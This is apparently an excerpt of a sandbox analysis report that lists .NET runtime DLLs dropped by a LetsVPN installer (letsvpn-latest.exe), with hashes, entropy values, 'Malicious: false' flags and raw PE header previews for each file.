Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................Q4....@..................................(..O....@...................+...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.805651039589859
Encrypted:	false
SSDEEP:	384:qJEYA2WkIWpEpwKANynsAw/98E9VF3AM+om6sYx9D:qyYA8NAw/KENAMxVPD
MD5:	8AF7247A87E7527320DCEE21D09D6CF1
SHA1:	5155B695010E577314EC3C3D7050C993A10C3EDD
SHA-256:	3EA9E823E4F2C4D974026E34BE287801B3D71C390C86BDF2A1A3061B8203E250
SHA-512:	D46D9C644316F2648E3C019ED11EBDCE67958B430C32C1FEB5B25BC808288D4DEDC5D7D0299C9547A88F37176EDC92A10D83D8674E7441AB9BAE9AE100D50723
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ...............................L....@................................. ,..O....@...................+...`...................................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h......................................BSJB............v4.0.30319......l.......#~..\|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Requests.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.928221667503601
Encrypted:	false
SSDEEP:	384:mJGWe4WeYpwKANynsAw/98E9VF3AM+o02Mp:qm6Aw/KENAMx2p
MD5:	2797E1151B356A42E082273195B6773C
SHA1:	59FC174B188CF5EED6D3AE6ACF01A40014614410
SHA-256:	443275D642CC88AE05BEC977B3A7906B9B3DB382B22CD0CEBE08ECA118DA1FDC
SHA-512:	3958EA65A30006D8E4B9A7E513DB12C9E69AE16E6C4ED27589D18438DA0D78D7CBAE8B4F30F02D89B86A683A37875D271CFF1B5EB931A2D88672081E0455F04B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................0)..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Security.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.845488888859241
Encrypted:	false
SSDEEP:	384:AdW1w3WesWa7pwKANynsAw/98E9VF3AM+oV45ho:51wxdAw/KENAMxIho
MD5:	8E75452F26F1DD475C790DAEA35979A3
SHA1:	A870500E220B0A1F4E60A05652F660267BB4E6BF
SHA-256:	C3E8D1A2C5AA7EDAAE3E42DF3D5C40FDBD77C2A026D851902795ECDADBF1376F
SHA-512:	5DF0F7D1252AC1A7369F5533D305293E22586852F5E16F2AAE9C34581787D5C89C0B242446F2EE85F2BB2C50CA86103F812231EFE78FF0253789EA029682B869
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~... ...@....... ...............................p....@.................................,..O....@...................+...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Sockets.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	25576
Entropy (8bit):	6.645198805547004
Encrypted:	false
SSDEEP:	384:eylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsWUJGpwKANynx:eyp12Bhkg3qnV/sULAw/KENAMxw
MD5:	0117EDAC090D4B6F45B66B4EB5B1E61A
SHA1:	9DABCFC9D00DFFAD6EFB04DAEE7138BA7B41BAEE
SHA-256:	3A968E6CB20814E4FDF5439AC2AFE609B5294BD9BA7412A0DE98D4C741F8CD9F
SHA-512:	63DCCBD83A4F83A0716DD7A55589D8C969A346836E9D2B0B0BAFCC62843059A75A61CDECA4B0080B8107D6625606A124773FE4557CD97FEAEEAA533278CC609B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............I... ...`....... ....................................@.................................gI..O....`...............8...+...........H............................................... ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o.......0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+.0..L.......(....~....%-.&~..........s....%.....~....%-.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebHeaderCollection.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9085869648323355
Encrypted:	false
SSDEEP:	384:fHPAW1bWb8pwKANynsAw/98E9VF3AM+oGkieQz:3rsAw/KENAMxO
MD5:	4312C57BD61256F8DABF2AC39260AB34
SHA1:	1589002195830CBE78406D54AA503EDFC92FE9FD
SHA-256:	AC7EE6034CCF97619980E10803994E516D4E0D53FDE0D7B7EFEECAFA31DC710D
SHA-512:	8C8038FD388D48732495DB7E68C499E9A9D2E1E58D6857CA988FB03356CDA6605A2C927C5FA28AA2783AD210063C8093D94AFBC288F62D69C8B5530007AB9C0A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................;'....@..................................(..O....@..P................+...`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.Client.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.911347469160971
Encrypted:	false
SSDEEP:	384:SNoqWD7WAQpwKANynsAw/98E9VF3AM+ocgxsqZDU1A:SNofTAw/KENAMx+qNX
MD5:	7A46A23B5974EBB3990F0F758A392CB3
SHA1:	099F457DF709F64D43EEF0BD68A3CD30298C8DCB
SHA-256:	21A7B85A723E424E79986B3C14441F734F0BBA2F15B9D3CABCE4B7BB1E20F75D
SHA-512:	D65D7604D56175C4E90913BFDA5292C5CE363C8D27EC539B0C390875F1E0640AA1CDCE10C530AAB0AD33F6017D60E6D2BEF07B1F6E1269D4411E83E14B7543C7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................\|(..O....@..@................+...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.913861277769009
Encrypted:	false
SSDEEP:	384:iGETSAWUEWrvpwKANynsAw/98E9VF3AM+o9JmEOJu:4T1UAw/KENAMxn6Ju
MD5:	FF7E10745B69A6514A4CE4F80DE711A2
SHA1:	FCD110A536F4D19A0533C2A4E53974ED551EB3B4
SHA-256:	CEDC329480C9FFD5F5533846CA820C00F25C5960B4C2E4CCD527DBB411487D69
SHA-512:	FB16AB33FF0DBD016AB3811B4EAB8A70AB61D3BB4361687C072A1D5EB8A301817A69F94D16F75BC1BA49DF33DE382407A57472A69A3F72D815724C0F08C5EB97
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@...................+...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Numerics.Vectors.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	111080
Entropy (8bit):	5.540754648195177
Encrypted:	false
SSDEEP:	1536:6POw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/EAwrxq:6Ww0SUUKBM8aOUiiGw7qa9tK/EhA
MD5:	E7CEED3878E0F46D73C02C52AB2F49B0
SHA1:	0FAFEBD57C72B065DE4515A5952930B2350F4E41
SHA-256:	9820B2D19A07C540B80F6D0DCA1541083FFE8C6E8AC6B9897A61A6C88F2CCA7A
SHA-512:	E7D01A36EE054557A5602C2F5C80232D00A163B1AC7A93FFC30FD3A7070B79724DE35782BB8BFDB46AE0E55911FCC77CD962153834B71768B3F99BA74BEFC312
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................M.....@.................................f...O........................+.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..\|?..........$... ...D.........................................(....&.l(....k&.l(....k..l.l(....k..l.l(....k&.l(....k&.l(....k&.l(....kj~....%-.&(....s....%........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(.....~....2r...p.(....2rG..p.(....2r...p.(....*2r...p.(.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ObjectModel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.902797795907002
Encrypted:	false
SSDEEP:	384:pcDagtDApWSKJWEwpwKANynsAw/98E9VF3AM+ozZWgE:pPKBBAw/KENAMx6
MD5:	2A0AE804890D979430A5C1AFC09232F9
SHA1:	0B6D9098D7772076E9D2424BE747EABE65654B50
SHA-256:	2E05A2BA67A620217727ED913156B6AB4E4CAF1D0FFC3D1075C45B103055C167
SHA-512:	060595F906C4DC9DF598DAFF8059134ACF7B24F7FC8F0D3268101B2F8F59CE4CDB0242AAA827CD6EB18C99F31C5A8C2C25647D00A2BC45B8647EEE919B004DF3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ...............................G....@.................................0+..O....@...................+...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.Extensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.916428540480234
Encrypted:	false
SSDEEP:	384:dIWD4WXRpwKANynsAw/98E9VF3AM+ocg66:d1GAw/KENAMxT
MD5:	568128E2CB86C76BBCE49ED34A852BBA
SHA1:	CB5DDD10884E5E35F7EA2CD23E8D65014439F862
SHA-256:	A8A1E81410EF695FF2C19E0B50351194BEF701D4D58925FE385D93B574D71D61
SHA-512:	6CF324E6CE9E7F4FACBCD9D6E7F1DC6420729A93066717AC74B89658FF5AB776DB8F3EC0F9BCE19B5704B97A9804FCADC3F5207F998C7EE625ABFA5CDE0DAF23
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..@................+...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.844890578241113
Encrypted:	false
SSDEEP:	384:hMWzQWpKpwKANynsAw/98E9VF3AM+o6xaBD0pK:h5bAw/KENAMxZBp
MD5:	0433784AED4480A669D77359CCC95264
SHA1:	9D2D1D8D46D91F50943425EF63C5ABF3B5E58114
SHA-256:	8CDF9310D0123492FB10868E7DFEDEE6A0B06CEBB3422EE37524A8ADE5189584
SHA-512:	1E9E906EDB6C25F6BD2B0A6FA547AAC670E87968A5E9F5CA3EBF3B69EB848A93A179C27236FE00DD273CFA51CCC9EE1FA961451168DD0C6F71797CA2F3D7339E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N... ...@....... ..............................?.....@..................................)..O....@..@................+...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.782256539426495
Encrypted:	false
SSDEEP:	384:4xDHKWAMWpupwKANynsAw/98E9VF3AM+owMbRBI:gD8DAw/KENAMxFs
MD5:	1C210937C40D4634EC7F874BD8EA91C3
SHA1:	1D746471D766B47D705D31B0CCEBE44705290AD1
SHA-256:	D8C641FE5C8AB29C69469D37195089563FC06B4FBC40DA67F339A52A5DAEC20E
SHA-512:	A6523B98FBA30905B3BDED1E3BB587BE4F69DF34DDF5FA0CEF8DCE5A373C7692E3A6DBBE0F2BC6F52AFD5C9A372D4A448A56189ECDED690897A1431E46C3A4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ...............................?....@................................. ,..O....@...................+...`...................................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Reader.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.886994140718831
Encrypted:	false
SSDEEP:	384:5LNBEW6pWYypwKANynsAw/98E9VF3AM+oNHe:5bMTAw/KENAMxo
MD5:	76E713DE0ED54900C5DD1F375229244A
SHA1:	DF3A9931699EC7E1DE3B97AC1E0354ECF4B77C1F
SHA-256:	7B7C90DB456C001EC50B5468F15E9A894B50EED93030017E637018A703893976
SHA-512:	99EA7F703E8CFA879C34E0FD18537E9A65EF15341BE9D991E3C74A81344A5D7BC339745D8316D1990D8089ABBF3793B0D850331F45E37530DEA3164D2B60F7FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...................................@.................................D(..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...\|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.ResourceManager.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.935931811005859
Encrypted:	false
SSDEEP:	384:KKkHKW/tWIRpwKANynsAw/98E9VF3AM+otfxZT:fuAAw/KENAMxDZT
MD5:	C05DE26D79E40BF7C232044B0326F2E0
SHA1:	5B6354A529526221A76A4E6254CE0AAABA765FCB
SHA-256:	71DD37692CB13777254FC205896176B2429224A3C6BC6527F276FC99EE4D45B5
SHA-512:	DAE672387B6BF6CDA6557A5592B17931053BF0EE2C8273FFEED92175C91D40EF00DE5137EB91D6B78A850C1D7D58D564F065FFBDDADBF2F1BD925FC47184C07C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................`2....@..................................(..O....@..`................+...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Writer.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.88642223241843
Encrypted:	false
SSDEEP:	384:OLnfIWqrWYQpwKANynsAw/98E9VF3AM+olAcvSo6:ODf4HAw/KENAMxacT6
MD5:	D74E5DA185EA81BAE3B3177E623DA777
SHA1:	8E845113C508CF00068FCA01EAB29D8662839D38
SHA-256:	BC6BE669D9A0720C084B9B1F2853D9A811BD44805ED13CB452461B5A1EFD9232
SHA-512:	33FC1A6476C263F232CF1EE48142E2632E6ECCD90967D48901AA2971072839688DAABA34017B1EEA38968BB18E099AA927E9B9FF4636A353514EEBC83BAC37D3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................M-....@.................................D(..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...\|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.Unsafe.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19944
Entropy (8bit):	6.654786792740954
Encrypted:	false
SSDEEP:	384:dybU8ndrbbT9NWB2WaxpwKANynsAw/98E9VF3AM+oOvBYuJ:dy5ndvWRAw/KENAMxLuJ
MD5:	06E9C4E6C56DDE71D95ABC8389240876
SHA1:	565322AD5DD23CB4A9D0A3C8731CC56B211576C4
SHA-256:	8566100401AF8CDC80A2419478743FB630871120BB384A9BA957FDBF880C37DE
SHA-512:	809EAEA96F4E4B19E4D019FC34893A035EFCA292683BD1D240CB8578482A0B88503D25B89C9038609C24D83BB79D9E2E62B8AA58C8A0372FD793ED9AC5C7F8C8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ....................................@..................................6..K....@..............."...+...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v...#.;.-.h.......0..#.....a5\|T%W...].!.%'..9.0...........q......0..............q.......0..............q.......0..................0......................0......................0............q.............0............q.............0..............0..............0..................0...............*...0..............

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.VisualC.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.868057632335088
Encrypted:	false
SSDEEP:	384:Zna8WK1WG8pwKANynsAw/98E9VF3AM+o1lD2:Zna03Aw/KENAMxu
MD5:	C5B5C96191D977A1506E6EED417B2BA7
SHA1:	B0D2C139B061FE456E3067B9142633F12D1074D1
SHA-256:	AB23FDFF57D74A92B849E9864D2562A22D76B6DD58F080A64D3AE60EA20E83A7
SHA-512:	66B90D7DF871D4D4021E3D98AD63B908F7BA7E832E226BDDDCB651F7DA08DD55F885E23E33B8004F62C54276227F8CB39D9A65071D380A83051037E199B31C31
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j... ...@....... ..............................M.....@....................................O....@...................+...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Extensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.823469381591017
Encrypted:	false
SSDEEP:	384:dBSWITWnhpwKANynsAw/98E9VF3AM+ot9vc0RZTz:d6dAw/KENAMxvvc0f3
MD5:	A284A89FF3110628BA61099B736A4F39
SHA1:	587822D8D69217DF8696A30D9843B088FAEFDCE3
SHA-256:	E07C749A7CD59B4FF24222D398D6665E287D7ADDDF55B014171594447F9702B6
SHA-512:	6DDA50625305FC5CA7652CCE9B8289C6BB70DD247184E9A94BBA75A961974A2D11F2C185205CCB749E2BC0882E519CDAC2DC3F801428C197F0530148AD484501
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0................. ...@....... ...................................@..................................)..O....@.. ................+...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.......................H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................\|.....\|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Handles.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.930234953706258
Encrypted:	false
SSDEEP:	384:088cIIWNoWAspwKANynsAw/98E9VF3AM+oJT3Z75:09cU4Aw/KENAMxF37
MD5:	C7119DFF7591888B03743BFD794229DC
SHA1:	D69160FF471741C137C2063B612516AEDFFCF133
SHA-256:	50AC07AE9F23E50F8227A995C2970C390EA12AAC322D7E664D57FE333663DA09
SHA-512:	C1E030FEED2B333BE712ADAEBF0F0B89C94D86354FD8F860E094EFBA5050FC4CDCA673CB190F0469FC45A65B41895F4EF4BAFD2FFD00A5DFCA7C7F710C69EE1C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ...................................@..................................)..O....@...................+...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..........................................................c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.RuntimeInformation.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23528
Entropy (8bit):	6.670521169818004
Encrypted:	false
SSDEEP:	384:okUwx9rm5go1fWKmmW6oqN5eWjaW2CpwKANynsAw/98E9VF3AM+ogIUSXp6D6:3rmoFmWdO6Aw/KENAMxRUiM2
MD5:	E1CDBA24AA0C7A72986136F32B7A8D1F
SHA1:	053D2CDD91BE05B179F9EEC927AE0CB91206F5F2
SHA-256:	914F5E3AD9A6CF8D0ECDE9B3BD10D89B302F36DA61E6D10696234EA51CEF34B1
SHA-512:	46DE959261A0F990BF8D4EC5E6F5A7D05BB53CA3C7119C482D837DD46ADAEDF78806CDE4F6EAEED24E91EFD2E77FFEDC2050B85B998C99876CEBDFEFDECEF42C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................1o....@.................................PE..O....`..x............0...+...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(....2r/..p.(..........(....2(.....(....^~....-.(.........~.....0..........~..........(.........(....-Y..(!....{/......5..,

